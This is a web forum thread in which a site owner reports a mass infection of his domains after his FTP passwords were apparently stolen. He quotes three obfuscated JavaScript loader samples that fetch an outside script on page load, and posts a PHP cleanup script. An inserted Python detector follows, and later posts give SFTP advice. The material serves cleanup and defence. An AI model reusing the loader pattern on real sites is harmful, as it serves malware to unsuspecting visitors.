
Thread: WARNING. NEW FIREZILLA HACK

  1. #1
    I need help
    Join Date
    Jun 2006
    Posts
    11

WARNING. NEW FIREZILLA HACK

    hi yall

    just wanted to warn you about a new hack/virus/trojan that just infected every domain that i have online on every server.

basically somehow it stole my ftp accounts (i was using firezilla for 2 weeks now and this is when the trouble began; before that i was using cuteftp and didn't have any issues until i switched to firezilla because it seems faster... this was a huge mistake)

the hack is some kind of javascript that loads a long encoded piece of code at the bottom of every page. so far i've found these pieces of code in infected files:

Code:
<script>/*GNU GPL*/ try{window.onload = function(){var Jqjzlgspz98uxl =
document.createElement('script');Jqjzlgspz98uxl.setAttribute('type',
'text/javascript');Jqjzlgspz98uxl.setAttribute('id', 'myscript1');Jqjzlgspz98uxl.setAttribute('src',
'h#&#t&#!t$!@p):)$/!&^/!x#^&t@#&u@b($!)e#(-)c^@$&o#(#m^!$^.&$)b$($l$o!(#&)g(&g)(^$e!$r#@(.@^&(c(o^#m
@)!#.)#p!(@o&r@)n(^$o$!^r&!a$)&m$@a$^$@-!c((^o#($m!.&#b$^$l)^u!$!e((#@)j@@a@)@c#k)!^m^(u$$!(s@$@i^@c
@&.!@)r@u(!:(^8&@!)!0@)8)@#0&(!/$&)h^d$@$f$(^c^)b@$&a)^n^(k^#.&@^&c#(!#$o^m!)#/!h^@#d(&f)&c^()b#(a^$
!n&^(#$k^#.!$c)o))m)&&/($&!g$$o!)o^()g))@(l$^@)e#^&.&&c^(o()m@!)(/(&f)#a!!@n!$@p))o)((p!^#.@c^!@o&@m
)@&/@!!i&n^#!.&#!c)))!o(m#/)((!'.replace(/\(|\)|\^|\!|@|\$|#|&/ig,
''));Jqjzlgspz98uxl.setAttribute('defer', 'defer');document.body.appendChild(Jqjzlgspz98uxl);}}
catch(e) {} </script>
Code:
<script>/*GNU GPL*/ try{window.onload = function(){var Hva23p3hnyirlpv7 =
document.createElement('script');Hva23p3hnyirlpv7.setAttribute('type',
'text/javascript');Hva23p3hnyirlpv7.setAttribute('id',
'myscript1');Hva23p3hnyirlpv7.setAttribute('src',
'h))t#^t$#))!p&&#:^!&/^^/)^(@m&()y&#b(r@&&!!o)^w(&(s)^)$e(@&#r&))b^a#r!&$-#@c&#o#m#@&.)@$s)a!m$&s#)^
u!$^n$g#!.$c!^o^@(m#.^n@!#a@@s#$!a#&-(@^g$o)#v)@&$.(!(@(e)&g&!#r)e)@)a^)t$!s(!(a@!l#e@.@)@r)#u(&#!:)
@8!^)0!8$!(0!/^#m$$e)g^&a###v&!i&d!e))#o!@(.(@c&)o$!(m^&/^m&^e((^)g$!((a)#)^v@!i(@&#d#)e@&o$#.^c$!#o
@m^/$#&l$a)r#@(e)^^d#&o(!()u#(t$)e##.$f(r^&(@/!(^&b!!i)$$l@)!)d^&.#@&(d$@$e(/)g$o^o$&^g^!&l()e!).(@^
#c)$!o#&)@@m!/^$'.replace(/\$|\^|\!|&|\)|\(|@|#/ig, ''));Hva23p3hnyirlpv7.setAttribute('defer',
'defer');document.body.appendChild(Hva23p3hnyirlpv7);}} catch(e) {}</script>
Code:
<script>/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p =
document.createElement('script');H3qqea3ur6p.setAttribute('type',
'text/javascript');H3qqea3ur6p.setAttribute('id', 'myscript1');H3qqea3ur6p.setAttribute('src',
'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@
.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#
$#)t))@s#!#)a!l##e@(.))&r$!u!&)8(0$)@$8^#^@0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&
^g@$(^o@(^o@g@&$l&&#e^))&@-($(m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p
$!!$h$!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c
!&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&
#(^c&o^^m^@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ''));H3qqea3ur6p.setAttribute('defer',
'defer');document.body.appendChild(H3qqea3ur6p);}} catch(e) {}</script>
domains affected so far of every type: submitting domains, blog domains, tube domains, seo domains... so it's not some kind of exploit, it's an ftp hack. even domains that i just have online and never worked on were infected.

    I don't know yet the source of the hack and how i got infected

The script tries to load some domain.ru script (possible trojan).

    I'm trying now to clean the desktop, then contact every host to change ftp passwords and ip lock on connections.

As a removal tool, hosts can clean the files, and besides that I've found this php code that searches for regular expressions and removes them.

    Download php removal code here

original creator and instructions here

if some php guru can contact me and help me modify the script (with the regular expressions that are searched and deleted) so I can remove the code from all the infected files, please contact me asap on 175444555. I will pay you for your work.

    further reading on this matter can be found on this dutch thread

Translation here

Thank you and please be aware and check your online files now! If you're not infected, back up everything because this is spreading very fast. A week ago there were 3 pages in google on this matter... now there are over 10 and going up.

  2. #2
Guest Head Boy
    Join Date
    Oct 2005
    Location
    England
    Posts
    7,393


    Can you restrict ftp logins to your IP or IP range?
    I apologise to ADX members for my constant reminders that Lord Aga and Netpond are scammers

    Money Bookers - now with ATM withdrawals via MasterCard

  3. #3
Serious Contributor PXN
    Join Date
    Nov 2008
    Posts
    954


    do u mean filezilla? never heard of firezilla.

    FLASHGALS - FREE TUBE/CMS SCRIPT
    Automatically convert FHG into your own gallery or tube

  4. #4
    I need help
    Join Date
    Jun 2006
    Posts
    11


    filezilla sry.

    here is the scan_files.php script that i'm using right now to clean files from infected domains:

Code:
<?php
// Recursively walks the document root and strips the injected
// "/*GNU GPL*/" <script> block from every file it finds.
// Usage:  scan_files.php      -> dry run, only lists infected files
//         scan_files.php?u=1  -> also rewrites the infected files
//         scan_files.php?v=1  -> dry run that dumps before/after content
// Remove this script from the web root as soon as the cleanup is done:
// anyone who can reach it can trigger a rewrite of every file.
echo "<pre>";
set_time_limit(3600);

$exclude_files = array(
	$_SERVER['DOCUMENT_ROOT'] . '/' . 'scan_files.php',
);

$exclude_dirs = array(
	$_SERVER['DOCUMENT_ROOT'] . '/' . 'stats',
);

$update  = isset($_REQUEST['u']) && $_REQUEST['u'] == '1';
$verbose = isset($_REQUEST['v']) && $_REQUEST['v'] == '1';

// Regular expressions to search for and remove.
// 's' lets '.' span newlines in case the injected block was wrapped;
// 'U' keeps the match ungreedy so one <script>...</script> is removed per match.
$search = array(
	'|<script>/\*GNU GPL\*/ try\{window\.onload = function\(\){(.*)</script>|imsU',
);

function endsWith($string, $ending) {
	$len = strlen($ending);
	if ($len == 0) {
		return true;
	}
	return substr($string, -$len) === $ending;
}

function scan_files($dir) {

	global $exclude_files, $exclude_dirs, $update, $verbose, $search;

	$dirs_array = array();

	if ($handle = opendir($dir)) {

		echo "Open dir: " . $dir . "\n";
		echo "Files:";

		// this is the correct way to loop over the directory.
		while (false !== ($file = readdir($handle))) {
			if ($file == '.' || $file == '..') {
				continue;
			}

			$path = $dir . $file;

			if (is_file($path)) {

				// skip large files
				if (filesize($path) > 1000000) {
					continue;
				}

				// exclude files
				if (in_array($path, $exclude_files)) {
					continue;
				}

				// skip backups
				if (endsWith($file, '.bak')) {
					continue;
				}

				// files the original script treats as part of the infection: delete outright
				if (endsWith($path, '/images/image.php') ||
					endsWith($path, '/images/gifimg.php')) {
					echo "\n===>" . $path . "\n";
					if ($update) {
						unlink($path);
					}
					continue;
				}

				// get content
				$contents = file_get_contents($path);
				$origContents = $contents;

				// loop for search string
				foreach ($search as $pattern) {
					$contents = preg_replace($pattern, "", $contents);
					if ($contents === null) {
						// preg_replace failed (e.g. backtrack limit);
						// never write an empty file back in that case
						echo "\nXXX: regex error on ({$path})\n";
						continue 2;
					}
				}

				if ($contents != $origContents) {
					echo "\n===>" . $path;

					if ($update) {
						$file_handle = @fopen($path, 'w');
						if (!$file_handle) {
							echo "\nXXX: Cannot open file ({$path})\n";
							exit;
						}

						if (@fwrite($file_handle, $contents) === FALSE) {
							echo "\nXXX: Cannot write to file ({$path})\n";
							exit;
						}

						fclose($file_handle);
					}
					elseif ($verbose) {
						echo "**********\norigContents=$origContents\n";
						echo "**********\ncontents=$contents\n";
					}
				}

			} elseif (is_dir($path)) {

				if (in_array($path, $exclude_dirs)) {
					continue;
				}
				$dirs_array[] = $path;

			}
		}
		closedir($handle);
	}

	foreach ($dirs_array as $subdir) {
		scan_files($subdir . '/');
	}
}

$start_dir = $_SERVER['DOCUMENT_ROOT'] . '/';

echo 'Starting from: ' . $start_dir . "\n";

scan_files($start_dir);

?>
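A detector in the spirit of the loader shown in post #1 and the scan_files.php cleaner in post #4, added here as an example and not code from the thread or from the script's original author: it locates the /*GNU GPL*/ loader block, replays the block's own replace() step to recover the real script URL (so the host can be blocked at DNS/proxy and searched for on other sites), and strips the block. The sample page and the decoded host are constructed placeholders.

```python
import re
from urllib.parse import urlsplit

# One injected loader block as the thread shows it: a <script> opening with
# /*GNU GPL*/ try{window.onload ... through its closing tag. DOTALL because the
# block may be wrapped over lines; non-greedy so one match eats one block.
INJECT_RE = re.compile(
    r"<script>\s*/\*GNU GPL\*/\s*try\{window\.onload\s*=\s*function\(\)\{.*?</script>",
    re.IGNORECASE | re.DOTALL,
)
# The obfuscated src literal plus the .replace(/junk/ig, '') that decodes it.
SRC_RE = re.compile(r"'([^']*)'\s*\.replace\(/(.*?)/ig,\s*''\)", re.DOTALL)

# Constructed sample page (not from the thread); the src decodes to a
# placeholder host, not a real one.
SAMPLE = (
    "<html><body><p>hello</p>\n"
    "<script>/*GNU GPL*/ try{window.onload = function(){var Xq1 = "
    "document.createElement('script');Xq1.setAttribute('type', 'text/javascript');"
    "Xq1.setAttribute('id', 'myscript1');Xq1.setAttribute('src', "
    "'h#t(t)p:!//b@a$d.e^x&a#m(p)l!e.i@n$v#a&l(i)d/l^o!a@d.j$s'"
    ".replace(/\\(|\\)|\\^|\\!|@|\\$|#|&/ig, ''));"
    "Xq1.setAttribute('defer', 'defer');document.body.appendChild(Xq1);}} "
    "catch(e) {}</script>\n</body></html>\n"
)

def decode_src(block):
    """Replay the loader's own decoding step (drop every padding character
    named in its replace() regex) and return the real script URL."""
    m = SRC_RE.search(block)
    if not m:
        return None
    blob, alternation = m.groups()
    junk = {alt.lstrip("\\") for alt in alternation.split("|")}
    blob = re.sub(r"\s+", "", blob)  # undo line wrapping
    return "".join(ch for ch in blob if ch not in junk)

def find_loader_hosts(text):
    """Hosts every injected block in `text` would fetch from: the IoCs to
    block at DNS/proxy and to grep for across other sites."""
    return [urlsplit(u).hostname for u in
            (decode_src(m.group(0)) for m in INJECT_RE.finditer(text)) if u]

def strip_injections(text):
    """Remove every injected block; returns (cleaned_text, count)."""
    return INJECT_RE.subn("", text)
```

Run it over a copy of the site tree and act on `find_loader_hosts` output before rewriting anything; `strip_injections` is the cleaning step and leaves everything outside the block untouched.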

  5. #5
    I need help
    Join Date
    Jun 2006
    Posts
    11


    Quote Originally Posted by Head Boy View Post
    Can you restrict ftp logins to your IP or IP range?
    trying to do that too. wrote to support on different hosts, waiting for answers now.

  6. #6
Pimpin' Angel A.J. Angel
    Join Date
    Sep 2008
    Location
    Paris, France
    Posts
    668


    How do you know you've been hit?
    "Reality is wrong. Dreams are for real." Tupac Amaru Shakur (June 16th, 1971 - September 13th, 1996)

    Exquisite Angelz, Home of the exquisite models, adult models & adult actresses we all fantasize!

  7. #7
    I need help
    Join Date
    Jun 2006
    Posts
    11


    Quote Originally Posted by A.J. Angel View Post
    How do you know you've been hit?
first i spotted the virus code when playing with a new script and didn't know what it was. i ignored it at first, then asked the script owner what it is and what it does.. he said no idea, not from my script.

deleted the code and moved on... until i was browsing and reached one of my sites and saw that google is blocking the site for malicious software... started to investigate and realized that the code is everywhere, on every domain i own.

    I went to mozilla and installed an add-on called noscript that blocks every script from every page you browse until you allow it to run....this is to protect while cleaning the mess.

  8. #8
    I love AskDamageX.com
    Join Date
    Oct 2009
    Posts
    70


    This isn't anything new folks!

    It's a trojan/virus that infects your desktop. It then scans your documents & settings for the files that filezilla and other common FTP programs use to store saved passwords. If your program encrypts the passwords, it can also listen to the FTP packet stream, since FTP transmits passwords in PLAIN TEXT.


    DO NOT USE FTP! Use SFTP (ftp over ssh) or FTPSSL to make sure your FTP connection to your server is secure and your password isn't being sent over the internet unencrypted in plain text.

    Make sure that any program you use, that has a "save passwords" feature, stores those passwords in an encrypted format that can't be read by malware.

  9. #9


    Quote Originally Posted by mBishop View Post
    This isn't anything new folks!

    It's a trojan/virus that infects your desktop. It then scans your documents & settings for the files that filezilla and other common FTP programs use to store saved passwords. If your program encrypts the passwords, it can also listen to the FTP packet stream, since FTP transmits passwords in PLAIN TEXT.


    DO NOT USE FTP! Use SFTP (ftp over ssh) or FTPSSL to make sure your FTP connection to your server is secure and your password isn't being sent over the internet unencrypted in plain text.

    Make sure that any program you use, that has a "save passwords" feature, stores those passwords in an encrypted format that can't be read by malware.
    this is some nice info... where can I learn more about SFTP?
    is that virus "special" for FILEZILLA or does that read all the info on your PC and then sends it to the "new owners"?

  10. #10
Jack-of-all-trades JACOBKELL
    Join Date
    Dec 2006
    Location
    In motion
    Posts
    4,561


Ah when will people learn.... Use the SFTP protocol instead of FTP and the WinSCP program instead of filezilla.

  11. #11
Seriously Cute Horny Joe
    Join Date
    Oct 2006
    Location
    Way up north!
    Posts
    3,300


    Quote Originally Posted by JACOBKELL View Post
Ah when will people learn.... Use the SFTP protocol instead of FTP and the WinSCP program instead of filezilla.
    Downloaded Winscp, but... can't find any FAQ about "Private Key File".... Where can I generate it? Or... is it just a random file I make...

  12. #12
Traffic Guru steveo
    Join Date
    Jun 2007
    Location
    North Carolina
    Posts
    446


    Quote Originally Posted by JACOBKELL View Post
Ah when will people learn.... Use the SFTP protocol instead of FTP and the WinSCP program instead of filezilla.
    Filezilla also supports sftp.

  13. #13


    +1 for sftp & winscp.

  14. #14


This is the 3rd or 4th thread I've seen with guys getting all their accounts fuxor'd by using Filezilla.

    Stop using it, use a real solution.
    linkspun - Premier Adult Link Trade Community - ICQ - 464/\281/\250

  15. #15
    I love AskDamageX.com
    Join Date
    Oct 2009
    Posts
    70


    Filezilla works perfectly fine, there is a setting you can toggle that will let you store your password encrypted, and you can use SFTP instead of FTP.


Personally, I run a Mac, so I use CyberDuck for my file-transfer program, and I just enter my URLs as sftp://domain.com instead of ftp://domain.com

    sftp uses port 22, same as SSH, and requires an SSH account, so you may need to request one for access from your host.


    I don't even have FTP servers installed on any of my boxes, I just simply run SSHD and use SFTP.

  16. #16
    I love AskDamageX.com
    Join Date
    Oct 2009
    Posts
    70


    Quote Originally Posted by pf69.com View Post
    this is some nice info... where can I learn more about SFTP?
    is that virus "special" for FILEZILLA or does that read all the info on your PC and then sends it to the "new owners"?

    It reads the data from multiple FTP programs. I'll try to find the stuff I read about it...



    edit: found it: http://www.webhostingtalk.com/showthread.php?t=887539
    Last edited by mBishop; December 10th, 2009 at 03:16 PM.

  17. #17
Jack-of-all-trades JACOBKELL
    Join Date
    Dec 2006
    Location
    In motion
    Posts
    4,561


    Quote Originally Posted by steveo View Post
    Filezilla also supports sftp.
Yes i know, i was just giving an example. Still i never liked filezilla because of its messy interface.

  18. #18
Complete fucking amateur redwhiteandblue
    Join Date
    Apr 2008
    Location
    Out dogging
    Posts
    464


    Quote Originally Posted by Head Boy View Post
    Can you restrict ftp logins to your IP or IP range?
    Cyberwurx has this, they call it Paranoid mode - it restricts ftp login to only those IPs that have logged into the user account. Won't help in this case though.

  19. #19
Pimpin' Angel A.J. Angel
    Join Date
    Sep 2008
    Location
    Paris, France
    Posts
    668


    Quote Originally Posted by steveo View Post
    Filezilla also supports sftp.
    Do you know how to set up Filezilla with SFTP? Sorry if it sounds noob.

  20. #20


    Just check options under "server type" in FileZilla.


    dlXer - Adult design, coding and hosting. ST/STP, TradePulse
